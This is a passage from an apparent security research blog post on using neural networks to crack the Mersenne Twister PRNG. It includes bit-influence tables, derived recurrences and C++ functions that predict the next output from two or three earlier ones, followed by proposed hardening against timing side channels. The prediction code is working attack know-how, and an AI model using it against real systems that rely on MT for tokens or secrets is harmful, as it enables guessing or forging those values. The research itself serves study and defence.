This means that the model has learned the exact formula that relates each state to the three previous states. Hence, if we got access to the three internal states at those specific locations, we could predict the next state. But, usually, we can only get access to the old random numbers, not the internal states. So, we need a different model that can reverse a generated, tempered number back to its internal state. We can then use this model to recover the states, use the twisting model to create the new state, and finally apply the normal tempering step to get the new output. But before we get to that, let's do a model deep dive.

3.1.5 Model Deep Dive

This section dives deeper into the model to understand what it has learned from the state-relations data and whether it matches our expectations.

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65 bits as input. Now, we would like to examine whether all 65 input bits have the same effect on the 32 output bits. In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the 96 hidden nodes of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, on the x-axis, to the 96 hidden nodes in the hidden layer:

We can notice that the second input bit, which corresponds to the LSB of the second state, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed in Section 2, it corresponds to the if-condition that checks the LSB and, depending on its value, XORs the new state with a constant value (a) that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes, as all its weights are close to zero. This maps to the twist code, where the second state is ANDed with lower_mask (0x7FFFFFFF in MT19937), which discards its MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can get to the logic closed form using the trained model. Of course, we could derive the closed form by enumerating all 65-bit input variations and testing each combination's outputs, but with 2^65 combinations this approach is prohibitively expensive. Instead, we can test the effect of each input on each output separately. This can be done by taking the training set and clamping each input bit individually, one time at 0 and one time at 1, and observing which bits in the output are affected. This shows which input bits affect each output bit. For example, when we checked the first input, which corresponds to the MSB of the first state, we found it only affects bit 30 in the output. A small sketch of this probing procedure is shown below, and the table after it lists the effect of each input bit on each output bit:
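
A minimal sketch of that probing loop, assuming the trained twist_model and the 65-bit encoded test inputs from the earlier sketches, and thresholding the sigmoid outputs at 0.5:

import numpy as np

def bit_influence(model, X):
    """For each input bit, report which output bits flip when that bit is forced to 0 vs. 1."""
    influence = {}
    for i in range(X.shape[1]):
        X0, X1 = X.copy(), X.copy()
        X0[:, i] = 0.0
        X1[:, i] = 1.0
        y0 = model.predict(X0, verbose=0) > 0.5
        y1 = model.predict(X1, verbose=0) > 0.5
        changed = np.any(y0 != y1, axis=0)          # output bits affected by input bit i
        influence[i] = list(np.flatnonzero(changed))
    return influence

# Probe with a small slice of the test set; per the table below, input bit 0
# (the first state's MSB) should map to output bit 30 only.
print(bit_influence(twist_model, X_test_65[:1024]))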

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which correspond to the last state, affect bits 0 to 31 in the output. We can also see that inputs 2 to 31, which correspond to bits 1 to 30 of the second state (ignoring its LSB and MSB), affect bits 0 to 29 in the output. And as we know, the state evaluation uses the XOR logic function. We can formalize the closed form as follows (ignoring input bits 0 and 1 for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is close to the final result; we still need to add the effect of input bits 0 and 1. Input bit 0, which corresponds to the first state's MSB, affects bit 30 of the output. Hence we can update the above closed form to:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1)

Lastly, input bit 1, which corresponds to the second state's LSB, affects 15 bits in the output. As it enters an XOR, if this bit is 0 it does not affect the output, but if it is 1 it flips all 15 listed bits (by XORing them). If we assemble these 15 bits into a hexadecimal value, we get 0x9908B0DF (which is the constant a in MT19937). We can then include this in the closed form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the ANDing will be 0, and hence the multiplication will result in 0. But if the LSB of the second state is 1, the result of the ANDing will be 1, and hence the multiplication will result in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) >> 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)
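
As a sanity check, this recurrence can be verified directly against raw MT states. The sketch below assumes the MT19937 class with its next_state helper from the first sketch:

rng = MT19937(seed=1234)
states = [rng.next_state() for _ in range(10_000)]

def predict_state(s_624, s_623, s_227):
    """Closed-form twist recovered from the model: predicts MT[i] from the three older states."""
    return (s_227
            ^ ((s_623 & 0x7FFFFFFF) >> 1)
            ^ ((s_624 & 0x80000000) >> 1)
            ^ ((s_623 & 1) * 0x9908B0DF)) & 0xFFFFFFFF

# The recovered recurrence reproduces every state after the first 624.
assert all(predict_state(states[i - 624], states[i - 623], states[i - 227]) == states[i]
           for i in range(624, len(states)))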

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

For this phase, we plan to train a neural network model to reverse the state tempering performed in the extract_number function of the code listing above. As we can see, a series of XOR and shift operations is applied to the state at the current index to generate the random number. So, we updated the code to output the state both before and after tempering, to be used as inputs and outputs for the neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words and their tempered values. We used the tempered values as inputs and the original states as outputs, creating a dataset of five million records. Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest of the data is used for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state value and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different model structures with different numbers of hidden layers and neurons in each layer, similar to what we did for the previous NN model, and again used the smallest model structure that had the most promising results. Hence, our neural network ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is only 21,120 (32×640 weights + 640 biases), and the number of parameters of the output layer is 20,512 (640×32 weights + 32 biases), which gives a total of 41,632 parameters to train. We can notice that this model is much bigger than the twisting model, as the operations done in tempering are much more complex than those done in twisting. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is a summary of the model parameters:

Tempering Model
  Model Type:             Dense Network
  #Layers:                2
  #Neurons:               672 Dense
  #Trainable Parameters:  41,632
  Activation Functions:   Hidden Layer: relu; Output Layer: sigmoid
  Loss Function:          binary_crossentropy
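
A compact sketch of this phase, reusing the MT19937 class and the to_bits helper from the earlier sketches (the tempering constants are those listed in Section 2; the training settings are assumptions):

import numpy as np
from tensorflow import keras
from tensorflow.keras import layers

def temper(y):
    """The MT19937 tempering step from the pseudocode in Section 2, applied to a NumPy array."""
    y = y.copy()
    y ^= (y >> 11) & 0xFFFFFFFF
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & 0xFFFFFFFF

rng = MT19937(seed=2021)
states = np.array([rng.next_state() for _ in range(5_000_000)], dtype=np.uint64)
tempered = temper(states)

X_tempered = to_bits(tempered)   # inputs: the 32 bits of the tempered output value
y_state = to_bits(states)        # outputs: the 32 bits of the original state word

untemper_model = keras.Sequential([
    keras.Input(shape=(32,)),
    layers.Dense(640, activation="relu"),     # 32*640 + 640 = 21,120 parameters
    layers.Dense(32, activation="sigmoid"),   # 640*32 + 32 = 20,512 parameters
])
untemper_model.compile(optimizer="adam", loss="binary_crossentropy",
                       metrics=["binary_accuracy"])
untemper_model.fit(X_tempered[:-100_000], y_state[:-100_000],
                   epochs=10, batch_size=4096,
                   validation_data=(X_tempered[-100_000:], y_state[-100_000:]))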

3.2.3 Model Results

After manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we achieved, we generated a new sample of 1,000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered value to its original state. Hence, we can use this model to reverse the generated numbers back to the internal states we need for the first model, use the twisting model to get the new state, and then use the normal tempering step to get the new output. But before we get to that, let's do a model deep dive.

3.2.4 Model Deep Dive

This section dives deeper into the model to understand what it has learned from the state-relations data and whether it matches our expectations.

3.2.4.1 Model Layers Connections

After training the model, we wanted to test whether any bits are unused or less connected. The following figure shows the weights connecting each input, on the x-axis, to the 640 hidden nodes in the hidden layer (each point represents one hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each input bit carries more or less the same weight as the others. We also plot in the following figure the connections between the hidden layer and the output layer:

The same observation holds for this figure, except that bits 29 and 30 appear less connected than the others, though they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But instead of doing so, we can derive a closed-form expression that takes the generated numbers at the positions mentioned in the first part, reverses them to internal states, generates the new state, and then generates the new number, all in one step. So, we plan to connect three copies of the reverse-tempering model to the model that generates the new state, and then temper its output to get the newly generated number, as shown in the following figure:

Now we have 3 × 32 input bits and 32 output bits. Using the same approach described before, we can test the effect of each input on each output separately. This shows how each input bit affects each output bit. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the corresponding bit in the output. Also, only 8 bits of the first input affect the output, and they all affect the same 6 output bits. For the second input, each bit affects several output bits. Although we could write a closed-form logic expression for this, we will write code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

#include <cstdint>

typedef uint32_t uint;  // the listing assumes a 32-bit unsigned "uint" type

// XOR masks learned by the model: mask i is XORed into the result
// when bit i of the second generated number (MT_623) is set
uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    // XOR in mask i for every set bit i of MT_623 (the second generated number)
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);

    // Only 8 bits of MT_624 matter; if their parity is odd, XOR in 0x44081102
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;

    // Every bit of MT_227 maps straight through to the output
    r ^= MT_227;
    return r;
}

We tested this code by using the standard MT library in C to generate the sequence of random numbers and matching the output of the function against the next number generated by the library. The outputs matched 100% over several million generated numbers with different seeds.

3.2.4.3 Further Improvement

We saw in the previous section that we can use three generated numbers to generate the new number in the sequence. But we noticed that we only need 8 bits from the first number: we XOR them together, and if the resulting parity is one, we XOR the result with the constant 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two candidate output values, one with and one without the XOR with 0x44081102. Here is the code for the new function.

#include <tuple>
#include <cstdint>

typedef uint32_t uint;  // 32-bit unsigned type assumed by the listing

using namespace std;

// Same XOR mask table as in the previous listing
uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

// Returns both candidate outputs: the second applies the 0x44081102 correction
// that would otherwise be derived from the (ignored) first number
tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);

    r ^= MT_227;
    return make_tuple(r, r ^ 0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm using only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to improve on them. Studying these issues can be particularly useful when MT is used as part of a cryptographically-secure PRNG, as in CryptMT. CryptMT uses the Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consists of two steps, twisting and tempering. Although the tempering step is applied on each call, the twisting step is only performed when we exhaust all the states and need to twist the state array into a new internal state. That is fine algorithmically, but from a security point of view it is problematic: it makes the algorithm vulnerable to a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number; when it is much longer, the start of a new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, an attacker can easily determine the start of the state twisting by setting a runtime threshold (around 0.4 ms in this experiment) on the generated numbers. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number, using the progressive formula we created earlier. Using this approach, we updated the code for MT and measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they produce the exact same sequences. Also, when we evaluated the mean runtime of both MT implementations over millions of generated numbers, the new approach is a little more efficient and, more importantly, has a much smaller standard deviation.
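
A sketch of this progressive variant, built on the MT19937 class from the first sketch (our own illustration): instead of twisting all 624 words at once, each call twists exactly one word using the same per-index recurrence, so every call does a comparable amount of work.

class MT19937Progressive(MT19937):
    """Produces the same output sequence as MT19937, but spreads the twist work over the calls."""

    def next_state(self):
        if self.index >= self.n:
            self.index = 0
        i = self.index
        # Twist exactly one word per call instead of all 624 at once.
        x = (self.MT[i] & self.upper_mask) + (self.MT[(i + 1) % self.n] & self.lower_mask)
        xA = x >> 1
        if x & 1:
            xA ^= self.a
        self.MT[i] = self.MT[(i + self.m) % self.n] ^ xA
        self.index += 1
        return self.MT[i]

# Sanity check: the progressive variant reproduces the reference sequence.
ref, prog = MT19937(seed=99), MT19937Progressive(seed=99)
assert all(ref.extract_number() == prog.extract_number() for _ in range(10_000))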

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning model that can correlate a generated output from MT with three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step to the old state as a whole and generate the new state from it. This can be achieved by performing the twist step into a new state array and swapping the new state with the old one after twisting all the states. This makes state prediction more complex, as different states will use different distances for evaluating the new state. For example, all the new states from 0 to 226 will use the old states from 397 to 623, which are 397 positions apart, and all the new states from 227 to 623 will use the old states from 0 to 396, which are 227 positions apart. This slight change generates a PRNG that is more resilient to the attack suggested above, as any generated output can be either 227 or 397 positions away from the output it depends on, and we don't know the position of the generated number (whether it is in the first 227 numbers of the state or in the last 397). A sketch of the idea is shown below. Although this will generate a different sequence, predicting the new state from the old ones will be harder. Of course, this suggestion needs to be reviewed more deeply to check the other properties of the resulting PRNG, such as its periodicity.
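
A sketch of the suggested variant (our own illustration, not a vetted PRNG design): the twist reads only from the old state array and writes into a fresh one, which is swapped in afterwards.

class MT19937WholeStateTwist(MT19937):
    """Variant that twists into a fresh array and swaps it in, instead of twisting in place.

    Note: this produces a different sequence than standard MT19937, and properties such as
    periodicity would need to be re-analyzed, as discussed above.
    """

    def twist(self):
        new_state = [0] * self.n
        for i in range(self.n):
            # Read exclusively from the old state array...
            x = (self.MT[i] & self.upper_mask) + (self.MT[(i + 1) % self.n] & self.lower_mask)
            xA = x >> 1
            if x & 1:
                xA ^= self.a
            # ...and write into the new one, so every new word is 227 or 397 positions
            # away from the old words it depends on.
            new_state[i] = self.MT[(i + self.m) % self.n] ^ xA
        self.MT = new_state
        self.index = 0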

5. Conclusion

In this series of posts, we have shared the methodology for cracking two well-known (non-cryptographic) pseudo-random number generators, namely xorshift128 and the Mersenne Twister. In the first post, we showed how we could use a simple machine learning model to learn the internal pattern in the sequence of generated numbers. In this post, we extended this work by applying ML techniques to a more complex PRNG. We also showed how to split the problem into two simpler problems, training two different NN models to tackle each one separately, and then used the two models together to predict the next number in the sequence from three generated numbers. We also showed how to dive into the models, understand how they work internally, and use them to create closed-form code that can break the Mersenne Twister (MT) PRNG. Lastly, we shared two possible techniques to improve the MT algorithm security-wise, as a means of thinking through the algorithmic improvements that can be made based on patterns identified by deep learning (while still recognizing that these changes do not themselves constitute sufficient security improvements for MT to be used where cryptographic randomness is required).

The Python code for training and testing the models outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code is built on top of an older version of the code shared in [3], with the changes described in part 1 of this series.

Acknowledgment

I would like to thank my colleagues at NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It
